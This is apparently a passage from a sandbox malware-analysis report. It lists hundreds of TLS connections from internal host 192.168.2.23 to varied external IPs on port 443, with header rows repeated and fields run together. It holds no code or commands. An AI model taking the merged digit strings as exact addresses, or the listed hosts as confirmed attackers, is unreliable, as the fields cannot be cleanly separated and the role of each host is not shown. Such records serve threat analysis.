                                                10157192.168.2.2356910140.3.33.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10158192.168.2.2345546106.231.198.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10159192.168.2.2358536172.7.200.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10160192.168.2.2341676109.251.41.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10161192.168.2.2354062128.247.103.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10162192.168.2.234856499.248.197.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10163192.168.2.2337712167.220.131.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10164192.168.2.235298459.208.173.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10165192.168.2.2348736181.195.191.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10166192.168.2.2341434195.107.237.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10167192.168.2.2334152129.172.39.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10168192.168.2.2360060134.40.115.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10169192.168.2.23372681.45.217.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10170192.168.2.2360974171.151.165.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10171192.168.2.2352060120.33.137.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10172192.168.2.2354282112.151.99.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10173192.168.2.233943492.65.245.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10174192.168.2.235705418.131.37.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10175192.168.2.235892895.18.187.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10176192.168.2.2358974119.38.19.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10177192.168.2.2346196113.251.142.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10178192.168.2.2354752209.254.34.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10179192.168.2.233960835.186.4.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10180192.168.2.233459218.234.53.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10181192.168.2.2335018145.134.239.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10182192.168.2.2352052187.73.226.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10183192.168.2.2357760147.225.50.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10184192.168.2.2333556138.254.186.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10185192.168.2.23573508.197.15.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10186192.168.2.235890431.32.151.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10187192.168.2.2333916102.198.144.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10188192.168.2.2350430175.70.230.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10189192.168.2.2344542209.254.244.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10190192.168.2.2337544125.34.27.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10191192.168.2.235080832.222.3.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10192192.168.2.2344908202.191.105.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10193192.168.2.235808668.84.105.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10194192.168.2.2353568213.85.245.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10195192.168.2.2334048204.168.182.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10196192.168.2.234125051.22.111.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10197192.168.2.2344758128.41.126.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10198192.168.2.2338108122.251.222.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10199192.168.2.233529061.136.147.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10200192.168.2.234959482.154.247.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10201192.168.2.233691412.58.78.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10202192.168.2.2344992175.115.103.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10203192.168.2.2348214167.130.102.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10204192.168.2.235954632.236.211.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10205192.168.2.23396388.53.174.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10206192.168.2.2339380206.182.160.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10207192.168.2.2356900115.177.207.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10208192.168.2.2358938210.40.64.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10209192.168.2.2344638206.175.72.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10210192.168.2.235380617.100.140.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10211192.168.2.235181641.238.124.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10212192.168.2.234021858.169.35.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10213192.168.2.234340859.104.14.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10214192.168.2.234104677.140.239.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10215192.168.2.2336348134.129.175.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10216192.168.2.234460693.91.0.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10217192.168.2.2360254148.165.85.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10218192.168.2.235511865.21.226.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10219192.168.2.235260494.116.255.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10220192.168.2.2342802105.28.70.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10221192.168.2.2352942116.57.232.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10222192.168.2.236071037.138.174.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10223192.168.2.2360510216.126.56.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10224192.168.2.233324031.183.95.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10225192.168.2.2358954196.113.13.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10226192.168.2.235373823.126.189.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10227192.168.2.2357816181.168.115.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10228192.168.2.234376431.103.219.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10229192.168.2.235002472.183.190.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10230192.168.2.234060290.84.212.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10231192.168.2.2356558117.46.87.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10232192.168.2.2336146137.89.60.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10233192.168.2.235459086.158.168.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10234192.168.2.2343988221.53.188.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10235192.168.2.233936859.166.4.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10236192.168.2.2342136198.41.156.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10237192.168.2.234798839.124.185.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10238192.168.2.2355950114.173.151.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10239192.168.2.2358398217.208.231.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10240192.168.2.234416835.233.223.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10241192.168.2.234531291.171.126.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10242192.168.2.2341132129.203.185.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10243192.168.2.234374691.19.200.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10244192.168.2.234831479.116.95.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10245192.168.2.2338854116.34.192.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10246192.168.2.2350734177.109.50.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10247192.168.2.2354386195.126.238.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10248192.168.2.2353298148.60.197.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10249192.168.2.233323882.75.92.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10250192.168.2.235174435.178.176.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10251192.168.2.2347252197.127.177.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10252192.168.2.234579661.128.196.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10253192.168.2.2355906172.189.136.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10254192.168.2.233444663.54.163.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10255192.168.2.234304023.168.56.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10256192.168.2.2358436199.176.87.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10257192.168.2.235823259.219.163.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10258192.168.2.234003872.40.7.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10259192.168.2.2333210106.223.83.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10260192.168.2.2338664102.148.17.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10261192.168.2.2356404145.226.229.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10262192.168.2.2346218188.29.76.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10263192.168.2.2334652175.229.173.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10264192.168.2.2342436196.66.44.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10265192.168.2.2339162203.218.83.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10266192.168.2.2346200211.121.226.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10267192.168.2.2359984136.238.112.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10268192.168.2.2339402216.196.48.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10269192.168.2.2352364180.91.135.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10270192.168.2.235003041.106.115.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10271192.168.2.2358998167.143.102.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10272192.168.2.235614694.237.44.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10273192.168.2.2354018142.52.195.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10274192.168.2.2333418158.199.143.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10275192.168.2.2341552220.166.226.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10276192.168.2.2345136201.73.10.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10277192.168.2.23335585.132.88.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10278192.168.2.2332880115.32.163.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10279192.168.2.234458886.63.75.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10280192.168.2.2340960194.39.170.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10281192.168.2.235379020.55.212.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10282192.168.2.2343010165.199.255.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10283192.168.2.2341370171.65.234.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10284192.168.2.235238425.234.231.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10285192.168.2.2359472144.162.53.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10286192.168.2.2343136111.234.222.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10287192.168.2.2339424170.252.217.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10288192.168.2.235510698.169.208.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10289192.168.2.233613069.95.1.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10290192.168.2.2341674178.210.46.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10291192.168.2.2334862183.168.125.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10292192.168.2.2349190192.123.80.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10293192.168.2.2351518192.22.115.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10294192.168.2.234304884.97.40.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10295192.168.2.234707420.103.72.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10296192.168.2.235658832.120.27.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10297192.168.2.2358454148.180.196.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10298192.168.2.234704663.75.98.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10299192.168.2.2343668137.211.250.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10300192.168.2.2348172178.162.244.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10301192.168.2.233804078.224.91.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10302192.168.2.235963487.3.187.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10303192.168.2.2340902132.78.161.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10304192.168.2.2345550192.134.126.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10305192.168.2.2338430156.180.195.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10306192.168.2.234758262.32.2.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10307192.168.2.23570602.79.133.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10308192.168.2.2333722207.45.117.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10309192.168.2.234885694.229.149.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10310192.168.2.2338384177.117.70.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10311192.168.2.2333384131.194.119.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10312192.168.2.2334732186.99.223.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10313192.168.2.2339356207.166.22.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10314192.168.2.235065065.52.54.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10315192.168.2.2349062182.192.245.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10316192.168.2.2334266198.40.10.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10317192.168.2.234070086.86.85.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10318192.168.2.2352818188.61.113.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10319192.168.2.2337244198.227.144.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10320192.168.2.2344234217.85.26.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10321192.168.2.2355376206.94.49.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10322192.168.2.2342126187.21.195.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10323192.168.2.2360790223.221.222.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10324192.168.2.234892440.1.46.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10325192.168.2.23455861.59.221.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10326192.168.2.2343732145.178.170.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10327192.168.2.233842412.77.54.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10328192.168.2.2336734207.107.72.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10329192.168.2.2358420213.199.88.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10330192.168.2.2350246135.137.212.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10331192.168.2.233890234.75.136.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10332192.168.2.2346256205.178.134.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10333192.168.2.2353504222.110.237.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10334192.168.2.235075435.40.109.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10335192.168.2.23494085.171.181.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10336192.168.2.2347550110.136.119.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10337192.168.2.2359330118.0.73.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10338192.168.2.2347390105.195.33.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10339192.168.2.235690879.195.111.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10340192.168.2.2350106216.200.196.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10341192.168.2.2337412187.38.21.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10342192.168.2.2345192166.73.120.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10343192.168.2.2356786130.36.249.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10344192.168.2.2355050132.182.61.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10345192.168.2.2349926197.129.48.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10346192.168.2.235319445.216.235.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10347192.168.2.234356813.235.67.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10348192.168.2.233448074.188.65.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10349192.168.2.2342478104.238.158.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10350192.168.2.235774635.89.162.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10351192.168.2.2338316146.169.114.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10352192.168.2.234598284.134.182.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10353192.168.2.2358324169.94.199.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10354192.168.2.234224824.115.104.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10355192.168.2.2351032100.186.69.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10356192.168.2.235704057.87.148.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10357192.168.2.234954844.155.234.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10358192.168.2.234354085.202.206.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10359192.168.2.2359950100.143.203.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10360192.168.2.23401869.213.141.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10361192.168.2.2356930177.201.103.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10362192.168.2.234992885.185.83.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10363192.168.2.234036619.120.240.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10364192.168.2.2356442133.69.6.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10365192.168.2.233476652.49.66.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10366192.168.2.2335086179.238.94.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10367192.168.2.233982837.233.38.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10368192.168.2.2351582157.126.240.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10369192.168.2.2351634197.135.169.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10370192.168.2.235056285.129.165.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10371192.168.2.233281849.24.178.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10372192.168.2.233502250.7.99.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10373192.168.2.2341770106.103.22.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10374192.168.2.234304652.174.246.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10375192.168.2.234371295.24.204.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10376192.168.2.233950641.156.240.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10377192.168.2.23474862.74.179.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10378192.168.2.235757245.94.189.97443
                                                TimestampBytes transferredDirectionData


